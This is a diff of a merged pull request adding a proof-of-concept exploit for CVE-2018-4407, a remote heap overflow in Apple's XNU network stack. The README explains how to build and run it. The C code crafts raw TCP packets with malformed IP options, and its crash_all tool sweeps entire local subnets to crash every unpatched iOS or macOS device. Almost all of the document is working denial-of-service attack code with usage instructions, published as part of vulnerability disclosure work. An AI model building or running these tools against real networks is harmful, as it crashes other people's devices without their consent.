Merge pull request #15 from kev/Apple_XNU_icmp_error

Exploit PoC for buffer overflow in icmp_error (CVE-2018-4407).

Author: Sam

apple/darwin-xnu/icmp_error_CVE-2018-4407/.gitignore

@@ -0,0 +1,3 @@
+*.o
+crash_all
+direct_attack

apple/darwin-xnu/icmp_error_CVE-2018-4407/Makefile

@@ -0,0 +1,22 @@
+all: direct_attack crash_all
+
+direct_attack: direct_attack.o send_packet.o utils.o
+	gcc -O2 -Wall direct_attack.o send_packet.o utils.o -o direct_attack
+
+crash_all: crash_all.o utils.o
+	gcc -O2 -Wall crash_all.o send_packet.o utils.o -o crash_all
+
+direct_attack.o: direct_attack.c send_packet.h utils.h
+	gcc -O2 -Wall -c direct_attack.c
+
+crash_all.o: crash_all.c send_packet.h utils.h
+	gcc -O2 -Wall -c crash_all.c
+
+send_packet.o: send_packet.c send_packet.h utils.h
+	gcc -O2 -Wall -c send_packet.c
+
+utils.o: utils.c utils.h
+	gcc -O2 -Wall -c utils.c
+
+clean:
+	rm -f *~ *.o direct_attack crash_all

apple/darwin-xnu/icmp_error_CVE-2018-4407/README.md

@@ -0,0 +1,37 @@
+## Heap buffer overflow in icmp_error (CVE-2018-4407)
+
+Proof-of-concept exploit for a remotely triggerable heap buffer overflow vulnerability in iOS 11.4.1 and macOS 10.13.6. This exploit can be used to crash any vulnerable iOS or macOS device that is connected to the same network as the attacker's computer. The vulnerability can be triggered without any user interaction on the victim's device. The exploit involves sending a TCP packet with non-zero options in the IP and TCP headers. It is possible that some routers or switches will refuse to deliver such packets, but it has worked for me on all the home and office networks that I have tried it on. However, I have found that it is not usually possible to send the malicious packet across the internet. 
+
+For more information about the vulnerability, see the [blog post on lgtm.com](https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407).
+
+The buffer overflow is in this code [bsd/netinet/ip_icmp.c:339](https://github.com/apple/darwin-xnu/blob/0a798f6738bc1db01281fc08ae024145e84df927/bsd/netinet/ip_icmp.c#L339):
+
+```c
+m_copydata(n, 0, icmplen, (caddr_t)&icp->icmp_ip);
+```
+
+The exploit sets `icmplen == 120`, which is far too big for the destination buffer. The buffer is overwritten with garbage, so this causes the kernel to crash.
+
+## Usage
+
+The exploit code is designed to be built and run on Linux. The code uses a raw socket to send the malicious packet, because we need to have complete control over the contents of the IP and TCP headers. On Linux, root privileges are required to open a raw socket. Therefore, `sudo` is required to run the PoC. But this is on the attacker's computer, not the victim's, so it does not mitigate the severity of the vulnerability. The code does not do anything malicious to the Linux machine: the root privileges are only used to open a raw socket.
+
+To build the PoC:
+
+```bash
+make
+```
+
+This builds two versions of the PoC: `direct_attack` and `crash_all`. The former requires you to supply the IP addresses of the target machines, like this:
+
+```bash
+sudo ./direct_attack 192.168.0.8 192.168.0.12
+```
+
+The latter does not require you to list the IP addresses:
+
+```bash
+sudo ./crash_all
+```
+
+Use `crash_all` with care: it will crash any unpatched Apple device that is connected to the same network as you.

apple/darwin-xnu/icmp_error_CVE-2018-4407/crash_all.c

@@ -0,0 +1,64 @@
+#include <ifaddrs.h>
+#include "send_packet.h"
+
+// Find all the network interfaces that we are attached to and send
+// out malicious packets to similar IP addresses. For example, if
+// one of our IP addresses is 192.168.0.13, then we will send malicious
+// packets to all addresses in the range 192.168.0.1-255.
+int main(int argc, char *argv[])
+{
+  struct ifaddrs *ifaddr;
+
+  // Create a raw socket for sending the malicious packets.
+  const int sock = create_raw_socket();
+  if (sock < 0) {
+    printf("Failed to create socket. Try running with sudo.\n");
+    return 1;
+  }
+
+  // Get the network interfaces that we are attached to.
+  if (getifaddrs(&ifaddr) < 0) {
+    printf("getifaddrs failed");
+    return 1;
+  }
+
+  // Loop over the network interfaces.
+  struct ifaddrs *ifa;
+  for (ifa = ifaddr; ifa != NULL; ifa = ifa->ifa_next) {
+    if (ifa->ifa_addr == NULL)
+      continue;
+
+    if (ifa->ifa_addr->sa_family == AF_INET) {
+      struct sockaddr_in *addr = (struct sockaddr_in *)ifa->ifa_addr;
+      printf("%s: %s\n", ifa->ifa_name, inet_ntoa(addr->sin_addr));
+
+      // Send out malicious packets to 253 similar IP addresses, by
+      // cycling through the final byte of the address. We skip values
+      // 0, 1, and 255 because they are not valid.
+      const uint16_t dst_port = ntohs(22);
+      const uint16_t src_port = ntohs(1234);
+      const uint32_t src = ntohl(addr->sin_addr.s_addr);
+      const uint32_t dst = src & 0xFFFFFF00;
+      size_t i;
+      for (i = 2; i < 255; i++) {
+        const int r0 = send_packet(
+          sock, htonl(src), src_port, htonl(dst | i), dst_port, 0, 0, 1, 0
+        );
+        if (r0 < 0) {
+          printf("send failed %s %ld\n", ifa->ifa_name, i);
+          break;
+        }
+      }
+    }
+  }
+
+  freeifaddrs(ifaddr);
+
+  const int r1 = close(sock);
+  if (r1 < 0) {
+    printf("could not close socket.\n");
+    return -1;
+  }
+
+  return 0;
+}

apple/darwin-xnu/icmp_error_CVE-2018-4407/direct_attack.c

@@ -0,0 +1,45 @@
+#include "send_packet.h"
+
+int main(int argc, char* argv[])
+{
+  if (argc <= 1) {
+    const char* progname = "a.out"; // Default program name
+    if (argc > 0) {
+      progname = argv[0];
+    }
+    printf("Usage: sudo %s <dest ip> <dest ip> ...\n", progname);
+    printf("Example:\n");
+    printf("  sudo %s 192.168.0.8 192.168.0.12\n", progname);
+    return 1;
+  }
+
+  const uint32_t src = 0; // 0net_addr(argv[1]);
+  const uint16_t dst_port = ntohs(22);
+  const uint16_t src_port = ntohs(1234);
+
+  const int sock = create_raw_socket();
+  if (sock < 0) {
+    printf("Failed to create socket. Try running with sudo.\n");
+    return 1;
+  }
+
+  int i;
+  for (i = 1; i < argc; i++) {
+    const uint32_t dst = inet_addr(argv[i]);
+    const int r0 = send_packet(sock, src, src_port, dst, dst_port, 0, 0, 1, 0);
+    if (r0 < 0) {
+      printf("send to %s failed\n", argv[i]);
+      return 1;
+    }
+  }
+
+  const int r1 = close(sock);
+  if (r1 < 0) {
+    printf("could not close socket.\n");
+    return -1;
+  }
+
+  // Data sent successfully
+  printf("Packets sent successfully\n");
+  return 0;
+}

apple/darwin-xnu/icmp_error_CVE-2018-4407/send_packet.c

@@ -0,0 +1,100 @@
+#include "send_packet.h"
+
+// Create and send a TCP packet, which triggers the following callpath:
+//
+// 1. ip_input()                bsd/netinet/ip_input.c:1835
+// 2. call to ip_dooptions()    bsd/netinet/ip_input.c:2185
+// 3. ip_dooptions()            bsd/netinet/ip_input.c:3222
+// 4. goto bad                  bsd/netinet/ip_input.c:3250
+// 5. call icmp_error           bsd/netinet/ip_input.c:3495
+// 6. icmp_error()              bsd/netinet/ip_icmp.c:203
+// 7. call m_copydata()         bsd/netinet/ip_icmp.c:339
+//
+int send_packet(
+  const int sock,
+  const uint32_t src, const uint16_t src_port,  // In network byte order
+  const uint32_t dst, const uint16_t dst_port,  // In network byte order
+  const uint32_t seq, const uint32_t ack_seq,
+  const uint16_t syn, const uint16_t ack
+) {
+  char packet[1024];
+  memset(packet, 0, sizeof(packet));
+
+  struct iphdr* ip_hdr = (struct iphdr*)packet;
+  const size_t ip_hdrlen = 60; // Maximum IP header size.
+  struct tcphdr* tcp_hdr = (struct tcphdr*)(ip_hdrlen + (char*)ip_hdr);
+  const size_t tcp_hdrlen = 60; // Maximum TCP header size.
+  const char* payload = tcp_hdrlen + (char*)tcp_hdr;
+  const size_t payload_len = &packet[sizeof(packet)] - payload;
+
+  // Fill in the IP Header
+  memset(ip_hdr, 0, ip_hdrlen);
+  ip_hdr->ihl = ip_hdrlen >> 2;
+  ip_hdr->version = 4;
+  ip_hdr->tos = 0;
+  ip_hdr->tot_len = ip_hdrlen + tcp_hdrlen + payload_len;
+  ip_hdr->id = htonl (54321);  // Id of this packet
+  ip_hdr->frag_off = 0;
+  ip_hdr->ttl = 255;
+  ip_hdr->protocol = IPPROTO_TCP;
+  ip_hdr->check = 0; // Checksum will be computed later.
+  ip_hdr->saddr = src;
+  ip_hdr->daddr = dst;
+
+  unsigned char* ip_opt = sizeof(struct iphdr) + (unsigned char*)ip_hdr;
+  size_t ip_optlen = ip_hdrlen - sizeof(struct iphdr);
+  memset(ip_opt, IPOPT_NOP, ip_optlen);
+  // This assignment makes the options invalid, which will
+  // trigger the call to icmp_error() at bsd/netinet/ip_input.c:3495
+  ip_opt[ip_optlen-1] = IPOPT_EOL;
+  ip_opt[0] = IPOPT_LSRR;
+  ip_opt[1] = 3;
+  ip_opt[2] = 0; // Invalid: triggers "goto bad" at ip_input.c:3281
+
+  // TCP Header
+  memset(tcp_hdr, 0, tcp_hdrlen);
+  tcp_hdr->source = src_port;
+  tcp_hdr->dest = dst_port;
+  tcp_hdr->seq = seq;
+  tcp_hdr->ack_seq = ack_seq;
+  tcp_hdr->doff = tcp_hdrlen >> 2;
+  tcp_hdr->fin = 0;
+  tcp_hdr->syn = syn;
+  tcp_hdr->rst = 0;
+  tcp_hdr->psh = 0;
+  tcp_hdr->ack = ack;
+  tcp_hdr->urg = 0;
+  tcp_hdr->window = htons (5840); // maximum allowed window size
+  tcp_hdr->check = 0; // Checksum will be computed later
+  tcp_hdr->urg_ptr = 0;
+
+  // Compute checksums.
+  tcp_checksum(
+    ip_hdr,
+    ip_hdrlen,
+    tcp_hdr,
+    tcp_hdrlen,
+    payload,
+    payload_len
+  );
+
+  // Send the packet
+  struct sockaddr_in sin;
+  memset(&sin, 0, sizeof(sin));
+  sin.sin_family = AF_INET;
+  sin.sin_port = dst_port;
+  sin.sin_addr.s_addr = dst;
+
+  const int r0 =
+    sendto(
+      sock, packet, ip_hdr->tot_len, 0,
+      (struct sockaddr *)&sin, sizeof(sin)
+    );
+  if (r0 < 0) {
+    const int err = errno;
+    printf("send failed %d err=%d %s\n", r0, err, strerror(err));
+    return -1;
+  }
+
+  return 0;
+}

apple/darwin-xnu/icmp_error_CVE-2018-4407/send_packet.h

@@ -0,0 +1,9 @@
+#include "utils.h"
+
+int send_packet(
+  const int sock,
+  const uint32_t src, const uint16_t src_port,  // In network byte order
+  const uint32_t dst, const uint16_t dst_port,  // In network byte order
+  const uint32_t seq, const uint32_t ack_seq,
+  const uint16_t syn, const uint16_t ack
+);